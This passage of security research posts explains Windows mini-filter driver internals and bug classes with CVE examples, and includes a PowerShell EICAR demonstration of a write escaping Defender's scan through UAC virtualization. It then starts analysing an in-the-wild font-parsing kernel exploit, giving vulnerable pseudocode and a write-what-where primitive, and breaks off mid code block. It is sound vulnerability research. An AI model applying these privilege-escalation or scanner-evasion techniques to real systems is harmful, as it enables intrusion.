      OUT PULONG ReturnOutputBufferLength

      );

The handling of the message is similar to a device IO control call. In fact under the hood it’s implemented using the device IO control code 0x8801B. As this code uses the METHOD_NEITHER method, the InputBuffer and OutputBuffer parameters are pointers into user-mode memory. The filter manager does check them with ProbeForRead and ProbeForWrite calls before calling the callback.
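To see why 0x8801B implies METHOD_NEITHER, the control code can be split into its CTL_CODE fields. This is a small sketch in portable C; the ioctl_fields type and the decode_ioctl name are made up for illustration, and only the bit layout comes from the public CTL_CODE macro.

```c
#include <assert.h>
#include <stdint.h>

#define METHOD_NEITHER 3u /* transfer type value from the WDK headers */

/* The four fields packed into a control code by CTL_CODE. */
typedef struct {
    uint32_t device_type; /* bits 16..31 */
    uint32_t access;      /* bits 14..15 */
    uint32_t function;    /* bits 2..13  */
    uint32_t method;      /* bits 0..1   */
} ioctl_fields;

/* Split a control code into its fields. */
static ioctl_fields decode_ioctl(uint32_t code) {
    ioctl_fields f;
    f.device_type = code >> 16;
    f.access      = (code >> 14) & 0x3u;
    f.function    = (code >> 2) & 0xFFFu;
    f.method      = code & 0x3u;
    return f;
}
```

Decoding 0x8801B this way gives device type 0x8, function 6, access 2 and method 3. Method 3 is METHOD_NEITHER, so the IO manager does no buffering on the caller's behalf.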

You can send a message to a filter connection port in PowerShell using the Send-FilterConnectionPort command specifying the data to send and the maximum size of the output buffer.

PS> Send-FilterConnectionPort -Port $port -Input @(0, 1, 2, 3) -MaximumOutput 0x100

For the kernel to user messages the user mode application needs to call FilterGetMessage to wait for the filter driver to send a message to user-mode. The kernel sends a message to the waiting user mode application using the FltSendMessage API which has the following prototype.

NTSTATUS FltSendMessage(

  PFLT_FILTER    Filter,

  PFLT_PORT      *ClientPort,

  PVOID          SenderBuffer,

  ULONG          SenderBufferLength,

  PVOID          ReplyBuffer,

  PULONG         ReplyLength,

  PLARGE_INTEGER Timeout

);

If there’s currently no waiting user mode process the API can wait for a specified timeout until the application calls FilterGetMessage. The returned buffer from FilterGetMessage contains a FILTER_MESSAGE_HEADER structure followed by the data. The header contains the size of the reply requested as well as a message ID which is used to correlate any reply to the kernel’s message.

To reply the user-mode application calls the FilterReplyMessage API. The user-mode application needs to append any data to a FILTER_REPLY_HEADER structure which contains the NT status code of the operation and the correlated message ID. The FltSendMessage API waits for the user-mode application to call FilterReplyMessage with the correct ID, and returns a buffer to the kernel-mode code. The message notification callback is not involved when using kernel to user-mode calls.
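The reply layout described above can be sketched in portable C. The two structs below are local mirrors of FILTER_MESSAGE_HEADER and FILTER_REPLY_HEADER with renamed fields, and build_reply is a hypothetical helper; a real client would use the definitions from fltUser.h and pass the buffer to FilterReplyMessage.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Local mirror of FILTER_MESSAGE_HEADER. */
typedef struct {
    uint32_t reply_length; /* size of the reply the driver expects */
    uint64_t message_id;   /* correlates the reply with the message */
} message_header;

/* Local mirror of FILTER_REPLY_HEADER. */
typedef struct {
    int32_t  status;       /* NT status code of the operation */
    uint64_t message_id;   /* must equal the ID of the received message */
} reply_header;

/* Write a reply header followed by the payload into 'out'.
 * Returns the total size, or 0 if the output buffer is too small. */
static size_t build_reply(const message_header *msg, int32_t status,
                          const void *data, size_t data_len,
                          uint8_t *out, size_t out_cap) {
    reply_header hdr;
    if (out_cap < sizeof(hdr) || data_len > out_cap - sizeof(hdr)) {
        return 0;
    }
    memset(&hdr, 0, sizeof(hdr));     /* zero padding bytes too */
    hdr.status = status;
    hdr.message_id = msg->message_id; /* copy the ID so the reply correlates */
    memcpy(out, &hdr, sizeof(hdr));
    if (data_len != 0) {
        memcpy(out + sizeof(hdr), data, data_len);
    }
    return sizeof(hdr) + data_len;
}
```

The point to notice is that the message ID is copied unchanged from the received header into the reply header, since that is what lets the kernel match the reply to its pending FltSendMessage call.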

Filter Callbacks

Typically the purpose of the mini-filter callbacks would be to inspect or modify pre-existing IO requests to a file system. Therefore one way of getting untrusted data to the driver is based on how it handles IO requests.  However, it’s possible to add additional functionality on top of an existing file system to allow for communication between user mode and kernel mode. The filter driver can add a callback for device or file system IO control code requests and check and handle its own control codes. This allows the filter to implement additional functionality on existing files.

The following is a simple example of adding a FSCTL_REVERSE_BYTES FS IO control code to an existing file system. This FSCTL is not really supported by any filesystem.

#define FSCTL_REVERSE_BYTES CTL_CODE(FILE_DEVICE_FILE_SYSTEM, \
                                     0x801,                   \
                                     METHOD_BUFFERED,         \
                                     FILE_ANY_ACCESS)

FLT_PREOP_CALLBACK_STATUS

PreFsControlOperation(

    PFLT_CALLBACK_DATA Data,

    PCFLT_RELATED_OBJECTS FltObjects,

    PVOID* CompletionContext

) {

    PFLT_PARAMETERS ps = &Data->Iopb->Parameters;

    if (ps->DeviceIoControl.Common.IoControlCode != FSCTL_REVERSE_BYTES) {

        return FLT_PREOP_SUCCESS_NO_CALLBACK;

    }

    char* buffer = ps->DeviceIoControl.Buffered.SystemBuffer;

    ULONG length = min(ps->DeviceIoControl.Buffered.InputBufferLength,

        ps->DeviceIoControl.Buffered.OutputBufferLength);

    // Stop at the midpoint: visiting every index would swap each pair twice.
    for (ULONG i = 0; i < length / 2; ++i)

    {

        char tmp = buffer[i];

        buffer[i] = buffer[length - i - 1];

        buffer[length - i - 1] = tmp;

    }

    Data->IoStatus.Status = STATUS_SUCCESS;

    Data->IoStatus.Information = length;

    return FLT_PREOP_COMPLETE;

}

The parameters for the FSCTL or IOCTL are separated based on the method of buffer access. In this case the FSCTL uses METHOD_BUFFERED so the parameters are accessed through the Buffered field. The filter driver needs to ensure it handles correctly all buffer types if it wants to implement its own control codes.
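The byte reversal itself can be tried outside the kernel. This is a user-mode sketch of the same swap loop in portable C, with reverse_bytes as an illustrative name. The loop stops at the midpoint, because swapping across every index would exchange each pair twice and leave the buffer unchanged.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Reverse 'length' bytes of 'buffer' in place. */
static void reverse_bytes(char *buffer, size_t length) {
    for (size_t i = 0; i < length / 2; ++i) {
        char tmp = buffer[i];
        buffer[i] = buffer[length - i - 1];
        buffer[length - i - 1] = tmp;
    }
}
```

With an odd length the middle byte is simply left where it is.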

This technique is used by the Windows Overlay Filter (WOF). For example, the FSCTL code FSCTL_SET_EXTERNAL_BACKING is not supported by NTFS. Instead it’s intercepted by a pre-operation callback in the WOF filter which completes it before it reaches the NTFS driver. The NTFS driver never sees the control code, unless the WOF driver happens to not be enabled.

Reparse Points

Reparse point buffers are most commonly known for implementing symbolic link support for NTFS. However the reparse point feature of NTFS can store arbitrary tagged data which is used by filter drivers to store additional offline state information for a file. For example, WOF uses its own reparse buffer, with the tag IO_REPARSE_TAG_WOF to store the location of the real file or status of a compressed file.

A user-mode application would set, query and delete reparse points using FSCTL control codes, such as FSCTL_SET_REPARSE_POINT. The recommended way for a mini-filter driver to set and remove a file’s reparse buffer is through the FltTagFile (or FltTagFileEx) and FltUntagFile APIs. Searching the driver’s imported APIs for these functions should quickly show whether the driver uses its own reparse buffer format.

To open a file with the supported reparse point buffer the driver could register for the post-create callback and wait for any request which returns the STATUS_REPARSE NT status then query for the reparse point data from the TagData field in the FLT_CALLBACK_DATA parameter. If the reparse tag matches one the filter driver supports it can re-issue the create request but specify the FILE_OPEN_REPARSE_POINT flag to open the file and ignore the reparse point. There are many problems with this, not least it requires two IO requests for a single creation and the driver would have to process every reparse event.

To simplify this Windows 10 supports the ECP_TYPE_OPEN_REPARSE_GUID ECP. You add the ECP with a buffer containing an OPEN_REPARSE_LIST_ENTRY structure which defines the reparse tag the driver handles. When NTFS encounters a reparse point buffer it checks to see if the tag is in the open reparse list. If so, instead of returning STATUS_REPARSE, it sets the OPEN_REPARSE_POINT_TAG_ENCOUNTERED flag in the OPEN_REPARSE_LIST_ENTRY structure, opens the file and returns a success NT status code. The filter driver can then check for the flag in the post-create callback. If the flag is set it can query the reparse tag from the file, for example using FSCTL_GET_REPARSE_POINT, and handle it accordingly.

The filter manager also exposes the FltAddOpenReparseEntry and FltRemoveOpenReparseEntry to simplify adding and removing these open reparse list entries. Searching for use of these APIs should give you an idea if the filter driver implements its own reparse point format.

The reason I mention this in the context of communication is that a filter driver will process these reparse buffers when accessing the file system. The NTFS driver only checks for the SeCreateSymbolicLinkPrivilege privilege if a user is writing the IO_REPARSE_TAG_SYMLINK tag. NTFS delegates the verification of the REPARSE_DATA_BUFFER structure which will be written to the file system by calling the kernel API FsRtlValidateReparsePointBuffer. The kernel API only does basic length checks for non-symlink tag types so the arbitrary bytes set in the DataBuffer field can be completely untrusted, which can allow for security issues during parsing.
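To make the risk concrete, here is a rough sketch in portable C of what a "basic length check" on a reparse buffer amounts to. It is not the implementation of FsRtlValidateReparsePointBuffer. The helper names are made up, and the only facts taken from the Windows headers are the 8-byte REPARSE_DATA_BUFFER header layout (tag, data length, reserved) and the value of IO_REPARSE_TAG_WOF.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define REPARSE_HEADER_SIZE 8u          /* tag (4) + data length (2) + reserved (2) */
#define IO_REPARSE_TAG_WOF  0x80000017u

/* Read little-endian integers without assuming alignment. */
static uint16_t read_le16(const uint8_t *p) {
    return (uint16_t)(p[0] | (p[1] << 8));
}

static uint32_t read_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Returns 1 if the header's data length matches the buffer size.
 * Nothing here looks at the bytes that follow the header. */
static int basic_length_check(const uint8_t *buf, size_t len) {
    if (len < REPARSE_HEADER_SIZE) {
        return 0;
    }
    return (size_t)read_le16(buf + 4) + REPARSE_HEADER_SIZE == len;
}

/* Returns the reparse tag; the caller must have checked the length first. */
static uint32_t reparse_tag(const uint8_t *buf) {
    return read_le32(buf);
}
```

A buffer that passes a check of this kind can still hold any bytes in its data portion, so a filter driver has to treat the payload for its own tag as attacker-controlled and validate every field it parses.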

Security Bug Classes

I’ve now provided examples of how a mini-filter operates and how you can communicate with it. Let’s finish up with an overview of potential bug classes to look for when doing a review. Some of these bug classes are common to any kernel driver, but others are very specifically due to the way mini-filters operate.

Where possible I’ll also provide an example of a vulnerability I’ve discovered to improve understanding. Note, this is not an exhaustive list; I’m sure there are some novel bug classes that I don’t know about which are missing from it. That is why it’s good to describe this process in more detail, so others can take advantage of my knowledge and find new and interesting issues.

To aid in analysis I’ve uploaded my header file I use in IDA Pro to populate the filter manager types. You can get it from github. I’ve tried to ensure it’s correct and up to date, but there’s a chance that it is not. YMMV.

Common and garden variety memory safety hazards

As mini-filters are native C code you can expect the same sorts of issues you’d find in any sizable code base, including integer wrapping and incorrect reference counting leading to memory safety hazards. Any of the described communication methods could result in untrusted data being processed and mishandled. I don’t think I need to describe this in any detail.

Ignoring the RequestorMode Value

All filtered IO requests have an assigned RequestorMode parameter in the FLT_CALLBACK_DATA structure which indicates whether it originated from user or kernel mode code. If an IO request is dispatched from kernel mode code the IO manager and file system drivers typically disable security checks, such as file access checking.

There are a couple of related bug classes you’ll see with regards to RequestorMode. The first class is the filter driver ignoring its value. This can be a problem if the filter driver redirects the IO request to another file either directly or by using a reparse operation during file creation.

For example, CVE-2018-0877 was an issue I found in the WCIFS driver which provides file system virtualization for Desktop Bridge applications. The root cause was the driver would reparse to a user controllable location if the requested file didn’t exist in privileged Windows directories.

It’s common to find kernel code opening files inside privileged directories with RequestorMode set to the kernel. The kernel code can make the assumption this can’t be tampered with as only an administrator can normally modify those directories. The end result was a normal user application could get a file opened in the user controllable location but with access checking disabled. In the proof-of-concept in the issue tracker I exploit this to redirect a request for a National Language Support (NLS) file to read arbitrary files on disk such as the SAM hive. The technique was described separately in this blog post.

Incorrect RequestorMode Check

The second bug class in checking the RequestorMode can occur during a file create operation. Specifically the RequestorMode field is checked but the driver does not verify if access checking has been re-enabled through the IO_FORCE_ACCESS_CHECK flag passed to IoCreateFile and variants. For a bit more context on this bug class refer to my blog post from last year where I collaborated with Microsoft on related issues.

FLT_PREOP_CALLBACK_STATUS

PreCreateOperation(

    PFLT_CALLBACK_DATA Data,

    PCFLT_RELATED_OBJECTS FltObjects,

    PVOID* CompletionContext

) {

    if (!SeSinglePrivilegeCheck(SeExports->SeTcbPrivilege, 

                                Data->RequestorMode)) {

        Data->IoStatus.Status = STATUS_ACCESS_DENIED;

        return FLT_PREOP_COMPLETE;

    }

    // Perform some privileged action.

    return FLT_PREOP_SUCCESS_WITH_CALLBACK;

}

The example above shows misuse of the RequestorMode field. The code passes the field directly to SeSinglePrivilegeCheck. If it indicates the call came from the kernel then the privilege check will always return TRUE, meaning the privileged action will be taken. As the linked blog post explains, this can happen if the file is opened by calling IoCreateFileEx or similar APIs with incorrect flags.

To guard against this issue the driver needs to check if the SL_FORCE_ACCESS_CHECK flag has been set in the OperationFlags field of the FLT_IO_PARAMETER_BLOCK structure. If that flag is set the value of RequestorMode should always be assumed to be from user mode.
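The guard can be expressed as a small helper that computes the mode to use for security decisions. This is a sketch in portable C rather than driver code: effective_mode is a hypothetical name, and the enum and flag values mirror KernelMode, UserMode and SL_FORCE_ACCESS_CHECK from the WDK headers. In a real filter the inputs would come from Data->RequestorMode and Data->Iopb->OperationFlags.

```c
#include <assert.h>
#include <stdint.h>

#define SL_FORCE_ACCESS_CHECK 0x01u

/* Mirrors the KPROCESSOR_MODE values used by the kernel. */
typedef enum { MODE_KERNEL = 0, MODE_USER = 1 } processor_mode;

/* Returns the mode that privilege and access checks should use. */
static processor_mode effective_mode(processor_mode requestor_mode,
                                     uint8_t operation_flags) {
    if (operation_flags & SL_FORCE_ACCESS_CHECK) {
        /* The caller asked for access checks, so treat it as user mode. */
        return MODE_USER;
    }
    return requestor_mode;
}
```

Passing the result of such a helper to the privilege check, instead of the raw RequestorMode, means a kernel-mode create with forced access checking no longer passes automatically.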

Driver and Kernel IO Operation Mismatch

The Windows platform is constantly gaining new features, even more so since the release of Windows 10 and its six month release cycle. These releases can add new information classes or IO control codes to the IO stack, or extend the functionality of existing features.

For the most part the mini-filter driver can just ignore operations it doesn’t care about. However, if it does process an IO operation it needs to match with what’s implemented in the rest of the OS, which can be difficult if the OS changes around the driver.

An example of this issue is the WOF driver’s handling of reparse points. To prevent applications from setting arbitrary reparse points with the IO_REPARSE_TAG_WOF tag it handles the FSCTL_SET_REPARSE_POINT IO control code and rejects any attempt to set a reparse point buffer with that tag. To complete the trick the driver also hides a file’s reparse point from being queried or removed if it’s set to IO_REPARSE_TAG_WOF.

The issue CVE-2020-17139 resulted from the OS adding a new FSCTL_SET_REPARSE_POINT_EX IO control code which the WOF driver didn’t handle. This allowed an application to add or remove the WOF IO tag which resulted in a way of getting an arbitrary file to have a cached code signature to bypass mechanisms such as Windows Defender Application Control.

Altitude sickness

Sorry, I couldn’t resist the pun. This is a bug class which is caused by the ordering of filter operations based on the assigned altitudes of the driver. For example, if you look at the list of filters from the fltmc command shown earlier in this blog post you’ll notice that WdFilter which is the real-time scanner for Windows Defender is at a much higher altitude than LUAFV which is the UAC file virtualization driver.

What this means is if LUAFV performs some operations, such as calling FltCreateFileEx which only dispatches the IO request to filters below LUAFV then Windows Defender will miss the file operations and not be able to act on them. Let’s show this in action with a simple PowerShell script.

function Write-EICAR {

    param([string]$Path)

    # Replace with a real EICAR string.

    $eicar = [System.Text.Encoding]::ASCII.GetBytes("<EICAR>")

    Use-NtObject($f = New-NtFile -Win32Path $Path -Disposition OpenIf -Access ReadData, WriteData) {

        $f.Length = 0

        Write-NtFile $f $eicar -Offset 0

    }

}

PS> Write-EICAR -Path "$env:TEMP\eicar.txt"

PS> Enable-NtTokenVirtualization

PS> Write-EICAR -Path "$env:windir\system32\license.rtf"

The Write-EICAR function opens or creates a new file at a specified path, truncates the file to a zero length, writes the EICAR string then closes the file. Note I’ve replaced the EICAR string with the dummy <EICAR>. You’ll need to look up the real string online and replace it before running the test. I did this to prevent some overzealous AV detecting the EICAR string and quarantining this web page.

We create an EICAR file in the temporary folder. Once the file has been closed Windows Defender’s real-time scanner should scan it and warn the user that it has quarantined the file.

However, once we enable virtualization using Enable-NtTokenVirtualization and write to an existing system file the file processing is handled inside the LUAFV driver after WdFilter has done its checking. Therefore the second command will succeed, although the file which is actually created is in the user’s virtual store, we’ve not overwritten license.rtf.

It’s worth pointing out that this only allows you to create the file on disk. The instant that virtualized file is used by any application Windows Defender will see it and quarantine it. Therefore it provides no real value to bypass Windows Defender’s signature checks. However, I think this is an interesting demonstration of the types of issues you could find due to the differing altitudes.
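The ordering effect can be modelled with a toy filter stack. This is only a sketch in portable C under stated assumptions: the filter type and dispatch_below are made up, and a request issued by a filter is modelled as visiting every filter with a strictly lower altitude. The altitude values used in the usage note (328010 for WdFilter, 135000 for LUAFV) are the commonly documented ones and should be checked against fltmc output on your system.

```c
#include <assert.h>
#include <stddef.h>

/* A filter attached to a volume at a given altitude. */
typedef struct {
    const char   *name;
    unsigned long altitude;
    int           requests_seen;
} filter;

/* Deliver one request to every filter strictly below 'from_altitude'.
 * Returns how many filters saw the request. */
static int dispatch_below(filter *stack, size_t count,
                          unsigned long from_altitude) {
    int delivered = 0;
    for (size_t i = 0; i < count; ++i) {
        if (stack[i].altitude < from_altitude) {
            stack[i].requests_seen++;
            delivered++;
        }
    }
    return delivered;
}
```

With a stack holding WdFilter at 328010, LUAFV at 135000 and a hypothetical filter at 100, a request entering from the top is seen by all three, while a request issued from LUAFV's altitude is seen only by the filter at 100. That is the situation in which the real-time scanner misses the virtualized write.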

The mismatch with the filter altitude is also a potential reason you’ll miss file events in Process Monitor. Process Monitor runs its mini-filter to capture file events at altitude 385200, which is above LUAFV, so you will not see most direct virtualization events. However, we can do something about this: we can use fltmc to detach the Process Monitor filter from a volume and reattach it at a much lower altitude. Start Process Monitor then run the following commands to reattach to the C: drive.

C:\> fltmc detach PROCMON24 C:

C:\> fltmc attach PROCMON24 C: -i "Process Monitor 24 Instance" -a 100

You might need to replace 24 with an appropriate version number for your version of Process Monitor. You should start seeing more events which were previously hidden by LUAFV and other filter drivers at lower altitudes. This should help you monitor file access for any interesting behavior. Sadly even though you can try and attach the Process Monitor filter to the named pipe device it won’t work as the driver doesn’t indicate support for that device.

Note that stopping and starting the Process Monitor capture will reset the volume instances for the filter driver and remove the low altitude instance. If you create the new instance without the instance name (the string after -i) then it won’t get deleted; however, Process Monitor will show duplicate entries for any IO request which is the same at both altitudes. The Process Monitor driver does not support attaching at a different altitude through any command line options. This is one of those cases where it’d be useful for the tooling to be open source so that the feature could be added.

As an example before adding the low altitude instance if you create the EICAR test file you’ll see the following events:

| ID | Path | Operation | Result | Detail |
| --- | --- | --- | --- | --- |
| 0 | C:\Windows\System32\license.rtf | CreateFile | SUCCESS | Desired Access: Read Data, Write Data |
| 1 | C:\Windows\System32\license.rtf | SetEndOfFile | SUCCESS | EndOfFile: 0 |
| 2 | C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf | WriteFile | SUCCESS | Offset: 0, Length: 68 |
| 3 | C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf | CloseFile | SUCCESS | |

I’ve added an ID column which indicates the event taking place. The events match the code for creating the EICAR file, we open the file for read and write access, set the length to 0, write the EICAR string and then close the file. Note that in event ID 2 the path to the file has changed from the original one in system32 to the virtual store. This is because the file is “delay virtualized” so it’ll only be created if a write IO request, such as changing the file length, is dispatched to the file.

Now let’s compare the events when the altitude is set to 100:

| ID | Path | Operation | Result | Detail |
| --- | --- | --- | --- | --- |
| 0 | C:\Windows\System32\license.rtf | CreateFile | ACCESS DENIED | Desired Access: Read Data, Write Data |
| | C:\Windows\System32\license.rtf | CreateFile | SUCCESS | Desired Access: Read Data |
| 1 | C:\Windows\System32\license.rtf | CreateFile | SUCCESS | Desired Access: Read Data, Read Attributes |
| | C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf | CreateFile | SUCCESS | Desired Access: Write Data, Write Attributes |
| | C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf | SetEndOfFile | SUCCESS | EndOfFile: 538 |
| | C:\Windows\System32\license.rtf | ReadFile | SUCCESS | Offset: 0, Length: 538 |
| | C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf | WriteFile | SUCCESS | Offset: 0, Length: 538 |
| | C:\Windows\System32\license.rtf | ReadFile | END OF FILE | Offset: 538, Length: 16,384 |
| | C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf | CloseFile | SUCCESS | |
| | C:\Windows\System32\license.rtf | CloseFile | SUCCESS | |
| | C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf | CreateFile | SUCCESS | Desired Access: Read Data, Write Data |
| | C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf | SetEndOfFile | SUCCESS | EndOfFile: 0 |
| 2 | C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf | WriteFile | SUCCESS | Offset: 0, Length: 68, Priority: Normal |
| 3 | C:\Windows\System32\license.rtf | CloseFile | SUCCESS | |
| | C:\Users\admin\AppData\Local\VirtualStore\Windows\System32\license.rtf | CloseFile | SUCCESS | |

You can see that the list of events is much longer in the second case (I’ve even removed some for brevity). For event 0 it’s no longer a single create IO request for the license.rtf file. As the user doesn’t have write access when the create call is made to the file system it results in an ACCESS DENIED error. The LUAFV driver sees the error in its post-create callback and as virtualization is enabled it makes a second create for only read access. This second create succeeds. Due to the altitude of LUAFV this process is normally hidden from the Process Monitor.

In the first table’s event ID 1 we saw the caller setting the file length to 0. However in the second table we now see that the virtual file needs to be created and the contents of the original file are copied into the new virtual file. Only after that operation has been completed will the length of the file be set to 0. The last 2 events are more or less the same.

I hope this is a clear demonstration both of how the altitude directly affects the operation of mini-filter drivers as well as how much file information you might be missing in Process Monitor without realizing it.

Concurrency and Reentrancy

The IO manager is designed to operate asynchronously. It’s possible that multiple threads could be calling into the same IO driver at the same time and the filter manager is no different. There’s no explicit locking in the filter manager which would prevent multiple IO requests being dispatched at the same time to the same file object. This can lead to concurrency and reentrancy issues.

The filter driver can assign shared state based on the file stream or file object. This can be extracted in the filter when operating on the file and used to store and retrieve the current state information. If you dispatch multiple IO requests to the same file it can result in an invalid state or memory corruption issues.

An example of this kind of issue is CVE-2019-0836 which was a race condition in the LUAFV driver related to handling of the SECTION_OBJECT_POINTERS structure in the file object. Basically by racing a read against a write IO request on the same file it was possible to get the wrong SECTION_OBJECT_POINTERS structure assigned to the virtual file allowing a normal user to bypass access checks and map a read-only file as writable.

To solve this problem the driver should avoid maintaining complex state between pre and post operation callbacks, or across any call to an API which could be trapped by a user-mode application.

Incorrect Forwarding of IO Operations

We showed earlier how to retarget an IO operation to another file object by switching the TargetFileObject pointer. This needs to be done very carefully as when working with file object pointers directly almost any operation can be performed on them. For example, if a file is opened read-only a write operation can still be dispatched to the file object itself and it’ll succeed.

The only thing which prevents a user-mode application from doing this is the kernel checks that the handle passed by the application to the NtWriteFile system call has the FILE_WRITE_DATA access right set. If not the system call can return STATUS_ACCESS_DENIED. However, if the handle has write access to a file object, but the filter driver redirects that operation to a read-only file then the check is bypassed and the user can write to a file they don’t necessarily control.

Another place this can happen is the dispatch of IO control codes. Each control code has a flag which indicates if the file handle requires read and/or write access to be dispatched. This check is performed in the IO manager before the request ever makes it to the file system. If a filter driver blindly forwards IO control codes to a separate file it could send a code which normally requires write access on the handle, bypassing security checks.

The LUAFV driver is a good example of a mini-filter driver where this forwarding takes place. The previously mentioned issue, CVE-2019-0836 while it’s a concurrency issue also relies on the fact that the file object can be written to even though it was opened read-only.
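The forwarding problem can be shown with a toy model of the handle check. This sketch in portable C is not how the IO manager is implemented: the file_object and handle types and the syscall_write function are made up, and the only values taken from the Windows headers are the FILE_READ_DATA and FILE_WRITE_DATA access bits.

```c
#include <assert.h>
#include <stddef.h>

#define FILE_READ_DATA  0x0001u
#define FILE_WRITE_DATA 0x0002u

/* A file object remembers how it was opened, but nothing enforces it. */
typedef struct {
    unsigned opened_access;
    int      writes;
} file_object;

/* A handle carries the access granted to the caller. */
typedef struct {
    file_object *object;
    unsigned     granted_access;
} handle;

/* Model of a write system call: the only access check is on the handle.
 * 'redirect_target', if not NULL, stands in for a filter swapping the
 * target file object. Returns 0 on success and -1 on access denied. */
static int syscall_write(handle *h, file_object *redirect_target) {
    file_object *target;
    if (!(h->granted_access & FILE_WRITE_DATA)) {
        return -1;
    }
    target = redirect_target != NULL ? redirect_target : h->object;
    target->writes++; /* no check against target->opened_access */
    return 0;
}
```

A write through a read-only handle is rejected, but a write through a writable handle that a filter redirects to a file object opened read-only goes through, because the check has already been made against the handle.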

Summary

In summary I think that mini-filter drivers are an under-appreciated source of privilege escalation bugs on Windows. In part that’s because they’re not easy to understand. They have complex interactions with the rest of the IO system which makes understanding difficult but can introduce really subtle and interesting issues. I hope I’ve given you enough information to better understand how mini-filter drivers function, how you communicate with them and what sorts of unique bug classes you might discover.

If you want some more information a good blog on the inner workings of filter drivers is Of Filesystems and Other Demons. It’s not been updated in a long while but it still contains some valuable information. You can also refer to MSDN which has a fairly comprehensive section on mini-filters as well as the Windows Driver Kit sample code. Finally as a reminder I’ve uploaded a filter manager header file for use in reverse engineering tools such as IDA Pro.

In-the-Wild Series: Windows Exploits

This is part 6 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Mateusz Jurczyk and Sergei Glazunov, Project Zero

In this post we'll discuss the exploits for vulnerabilities in Windows that have been used by the attacker to escape the Chrome renderer sandbox.

1. Font vulnerabilities on Windows ≤ 8.1 (CVE-2020-0938, CVE-2020-1020)

Background

The Windows GDI interface supports an old format of fonts called Type 1, which was designed by Adobe around 1985 and was popular mostly in the 1990s and early 2000s. On Windows, these fonts are represented by a pair of .PFM (Printer Font Metric) and .PFB (Printer Font Binary) files, with the PFB being a mixture of a textual PostScript syntax and binary-encoded CharString instructions describing the shapes of glyphs. GDI also supports a little-known extension of Type 1 fonts called "Multiple Master Fonts", a feature that was never very popular, but adds significant complexity to the text rasterization logic and was historically a source of many software bugs (e.g. one in the blend operator).

On Windows 8.1 and earlier versions, the parsing of these fonts takes place in a kernel driver called atmfd.dll (accessible through win32k.sys graphical syscalls), and thus it is an attack surface that may be exploited for privilege escalation. On Windows 10, the code was moved to a restricted fontdrvhost.exe user-mode process and is a significantly less attractive target. This is why the exploit found in the wild had a separate sandbox escape path dedicated to Windows 10 (see section 2. "CVE-2020-1027"). Oddly enough, the font exploit had explicit support for Windows 8 and 8.1, even though these platforms offer the win32k disable policy that Chrome uses, so the affected code shouldn't be reachable from the renderer processes. The reason for this is not clear, and possible explanations include the same privesc exploit being used in attacks against different client software (not limited to Chrome), or it being developed before the win32k lockdown was enabled in Chrome by default (pre-2015).

Nevertheless, the following analysis is based on Windows 8.1 64-bit with the March 2020 patch, the latest affected version at the time of the exploit discovery.

Font bug #1

The first vulnerability was present in the processing of the /VToHOrigin PostScript object. I suspect that this object had only been defined in one of the early drafts of the Multiple Master extension, as it is very poorly documented today and hard to find any official information on. The "VToHOrigin" keyword handler function is found at offset 0x220B0 of atmfd.dll, and based on the fontdrvhost.exe public symbols, we know that its name is ParseBlendVToHOrigin. To understand the bug, let's have a look at the following pseudo code of the routine, with irrelevant parts edited out for clarity:

int ParseBlendVToHOrigin(void *arg) {

  Fixed16_16 *ptrs[2];

  Fixed16_16 values[2];

  for (int i = 0; i < g_font->numMasters; i++) {

    ptrs[i] = &g_font->SomeArray[arg->SomeField + i];

  }

  for (int i = 0; i < 2; i++) {

    int values_read = GetOpenFixedArray(values, g_font->numMasters);

    if (values_read != g_font->numMasters) {

      return -8;

    }

    for (int num = 0; num < g_font->numMasters; num++) {

      ptrs[num][i] = values[num];

    }

  }

  return 0;

}

In summary, the function initializes numMasters pointers on the stack, then reads the same-sized array of fixed point values from the input stream, and writes each of them to the corresponding pointer. The root cause of the problem was that numMasters might be set to any value from 0 to 16, but both the ptrs and values arrays were only 2 items long. This meant that with 3 or more masters specified in the font, accesses to ptrs[2] and values[2] and larger indexes corrupted memory on the stack. On the x64 build that I analyzed, the stack frame of the function was laid out as follows:

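| Stack offset | Contents |
| --- | --- |
| ... | ... |
| RSP + 0x30 | ptrs[0] |
| RSP + 0x38 | ptrs[1] |
| RSP + 0x40 | saved RDI |
| RSP + 0x48 | return address |
| RSP + 0x50 | values[0 .. 1] |
| RSP + 0x58 | saved RBX |
| RSP + 0x60 | saved RSI |
| ... | ... |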

The ptrs and values rows (green in the original table) are the user-controlled local arrays, and the saved registers and the return address (red) are internal control flow data that could be corrupted. Interestingly, the two arrays were separated by the saved RDI register and the return address, which was likely caused by a compiler optimization and the short length of values. A direct overflow of the return address is not very useful here, as it is always overwritten with a non-executable address. However, if we ignore it for now and continue with the stack corruption, the next pointer at ptrs[4] overlaps with controlled data in values[0] and values[1], and the code uses it to write the values[4] integer there. This is a classic write-what-where condition in the kernel.

After the first controlled write of a 32-bit value, the next iteration of the loop tries to write values[5] to an address made of ((values[3]<<32)|values[2]). This second write-what-where is what gives the attacker a way to safely escape the function. At this point, the return address is inevitably corrupted, and the only way to exit without crashing the kernel is through an access to invalid ring-3 memory. Such an exception is intercepted by a generic catch-all handler active throughout the font parsing performed by atmfd, and it safely returns execution back to the user-mode caller. This makes the vulnerability very reliable in exploitation, as the write-what-where primitive is quickly followed by a clean exit, without any undesired side effects taking place in between.
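The overlap between the two arrays follows directly from the stack layout. The sketch below, in portable C, just redoes that arithmetic. The offsets 0x30 and 0x50 come from the layout above, the element sizes assume 8-byte pointers and 4-byte Fixed16_16 values, and the function names are made up for illustration.

```c
#include <assert.h>

#define PTRS_OFFSET   0x30u /* RSP offset of ptrs[0] */
#define VALUES_OFFSET 0x50u /* RSP offset of values[0] */
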